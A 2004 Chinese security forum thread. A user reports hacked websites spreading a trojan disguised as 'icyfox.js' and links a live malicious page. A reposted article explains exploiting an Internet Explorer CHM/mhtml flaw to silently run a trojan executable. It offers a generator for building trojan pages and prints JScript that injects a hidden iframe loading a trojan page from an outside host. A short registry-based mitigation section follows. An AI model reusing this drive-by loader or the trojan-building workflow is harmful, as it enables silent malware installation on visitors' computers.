20CN网络安全小组论坛 - 病毒专区 - 最近木马猖獗，n多网站被干掉。有没有高手出来管一管？

论坛: 病毒专区标题: 最近木马猖獗，n多网站被干掉。有没有高手出来管一管？

作者: jo_fox [jo_fox]

论坛用户

他们黑了一堆网站，利用IE传播icyfox.js，实际上这个icyfox.js杀毒软件查不到，只是用了这个名字而已

特别是各大游戏官方网站，外挂官方网站纷纷中照

病毒网页 http://www.gwsw.com/down/zhutou.htm

有没有高手出来管一管？

地主发表时间: 04-10-09 14:31

回复: authen [authen]

论坛用户

看不出什么么

B1层发表时间: 04-10-09 14:51

回复: jo_fox [jo_fox]

论坛用户

我试用了瑞星，金山，江民，北信源，熊猫卫士,东方卫士，卡巴斯基

只有卡巴斯基认到是

TrojanSpy.Win32.Delf.dk

其他的练个屁都没放

B2层发表时间: 04-10-09 15:33

回复: BrideX [bridex]

论坛用户

是最新的脚本病毒。

B3层发表时间: 04-12-08 10:29

回复: BrideX [bridex]

论坛用户

我错了，是老脚本病毒。。。
看下面

"过时"的无脚本网页木马

--------------------------------------------------------------------------------
阅读:20943 时间:2004-11-17 6:13:19 来源:黑客基地编辑:古典辣M°　
作者：冰狐浪子　　http://www.icyfoxlovelace.com

现如今网络上各种网页木马肆虐，上网时要处处防范，我本不想再给网络中加上这把火，所以本文所讲的网页木马我试验成功后，因为发觉其危害过大（win98、winme、win2000、winxp、win2003下均测试成功^*^），只仅仅发给了几位好友进行测试，随着时间的推移，等到今天这个漏洞补丁已经发布几个月后，我觉得有必要和热爱技术的网友共享一下，所以我写下了此文！
　　标题中的"过时"也是指补丁已发布而言，本文所介绍的网页木马和现如今流行的几种网页木马相比，应该还是比较新的，危害性也比较大，我衷心希望各位读者能够以研究为目的，不要用它肆意在网络上传播各种木马或恶意程序，以免给他人及自己带来不必要的麻烦。

　　《黑防》曾经介绍过mhtml漏洞，在利用上因为需要本地权限，不得不使用脚本结合其他漏洞来获得本地权限，mhtml漏洞之后网络上又出现"Microsoft Internet Explorer未明CHM文件处理任意代码执行漏洞"，仔细看后我觉得这个应该是mhtml漏洞的延伸，于是我开始进行大量测试，希望可以更有效的利用这个漏洞。
　　测试过程是枯燥的我就不多说啦，我就直接把我获得的结果告诉大家，就是采用object标签结合"未明CHM文件处理任意代码执行漏洞"可以不需要借助任何其它控件如Scripting.FileSystemObject或ADODB.Stream，不需要任何JAVASCRIPT或VBSCRIPT脚本代码，就可以执行任意程序，这在当前各种网页木马时比较少见的现象呀，让我想起了古老的"错误MIME漏洞"！不用控件和脚本的好处是相当多的，至少可以极大的躲避各种杀毒软件的围剿，要知道现在连ADODB.Stream也被瑞星专门写了个软件来卸载呀！

　　废话少说，看代码先(icyfox-muma.htm)：

其中文件"icyfox.chm"里面包含两个文件：icyfoxlovelace.exe　和　icyfox.htm，其中"icyfoxlovelace.exe"不用说就是一个木马程序啦，"icyfox.htm"文件的内容如下：

至于如何制作icyfox.chm文件我就不多说啦，不会的朋友请参阅《黑客防线》第六期的"CHM木马也疯狂"一文即可。

　　木马分析，"icyfox-muma.htm"中利用OBJECT标签结合CHM文件处理任意代码执行漏洞，使得icyfox.chm成为本地权限的文件，而由于icyfoxlovelace.exe　和　icyfox.htm　同处于icyfox.chm中也被视为本地权限的文件，这样由于本地安全设置默认允许未签名控件运行，使得"icyfoxlovelace.exe"在没有任何提示的情况下被作为一个控件而运行！见图一：

文件"icyfox-muma.htm"中"mk:@MSITStore:mhtml:C:\.mht!http://www.godog.y365.com/cs/muma/icyfox.chm::/icyfox.htm"中的
"mk:@MSITStore:"可以替换为另外两种访问帮助文档的协议"mk-its:"或"its:"，"C:\.mht"是一个并不存在的mht格式的文件，当然也可以用同格式不同扩展名的eml来替代如"C:\not.eml"，甚至用任何其他只要硬盘并不存在的文件也可以比如"C:\icyfox.txt"，呵呵，因为指定"mhtml:"协议后无论后面是何种扩展名，IE总会用此协议来解析；同样的"icyfox.chm"也是可以任意改为其他扩展名，因为已经指定采用"mk:@MSITStore:"协议来访问，比如可以把它改为"icyfox.js"^*^。

　　为了方便各位网友测试，我特地写了一个生成器送给大家（其实是我不想像上次那样被人追杀^#^），生成器使用方法很简单，解压缩后，把其中的"#.EXE"这个文件用你的木马替换掉，注意不要把它改为其它名字，然后运行"冰狐浪子超级网页木马生成器.jse"，等一段时间后即可在同一目录中获得两个文件"icyfox.htm"和"icyfox.js"，"icyfox.htm"用我讲过的"任意添加NUL空字符(00h)"进行了加密，可以改名或嵌入其它页面中，而"icyfox.js"就是上面讲到的"icyfox.chm",也请不要改为其他名字，需要注意的是：我是采用js脚本编写的这个生成器，使用了Scripting.FileSystemObject和WScript.Shell控件，所以可能会引起杀毒软件的报警，请放心使用，里面应该没有病毒地　^*^　！

　值得注意的一点是，如果"mhtml"协议已经被去掉或不被支持的话(我在测试时遇到几次这种情况)，会产生如图二的错误对话框，

这样容易引起怀疑，解决方法为写点js代码进行判断(还是我聪明^&^呵呵)，代码如下：
<HTML><HEAD>
<TITLE>判断是否支持"mhtml"协议－－冰狐浪子</TITLE>
</HEAD><BODY>
<SCRIPT language=JScript>
window.status="完毕";
var mht=0;
</SCRIPT>
<SCRIPT language=JScript src="mhtml:http://www.godog.y365.com/cs/muma/mht.mht!!">
</SCRIPT>
<SCRIPT language=JScript>
if(mht){
var mumaurl="http://www.godog.y365.com/cs/muma/icyfox.htm";
var icyfoxmuma='<IFRAME src="'+mumaurl+'" style="display:none;" width=0 height=0></IFRAME>';
document.write(icyfoxmuma)
alert("支持"mhtml"协议"); }
else{ alert("不支持"mhtml"协议"); }
</SCRIPT>
</BODY></HTML>

其中mht.mht中的代码如下：

MIME-Version: 1.0
Content-Type: multipart/mixed;boundary="1"

--1
Content-Type:application/x-javascript;name="!"
Content-Transfer-Encoding: 7bit
Content-Location: !
Content-ID: <!>

mht=1;
--1--

　　这样就可以当"mhtml"协议不被支持时不调用网页木马，从而更完美一点点，测试时注意把上面的路径"http://www.godog.y365.com/cs/muma/"改为测试路径呀！

弥补漏洞防止木马

修改本地安全属性，相应的注册表键值为：
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
下的1004项的值由原来的０改为十六进制的３

或者去掉mhtml协议，相应的注册表键值为：
HKEY_CLASSES_ROOT\PROTOCOLS\Handler
把下面的"mhtml"删除或改名!

当然最好的办法是下载并安装相对应的IE补丁!

B4层发表时间: 04-12-08 10:34

回复: BrideX [bridex]

论坛用户

没有人看么？

B5层发表时间: 04-12-17 16:28

回复: fwent [fwent]

论坛用户

我怎么没发现那个文件啊？什么都没有？

B6层发表时间: 04-12-17 18:03

论坛: 病毒专区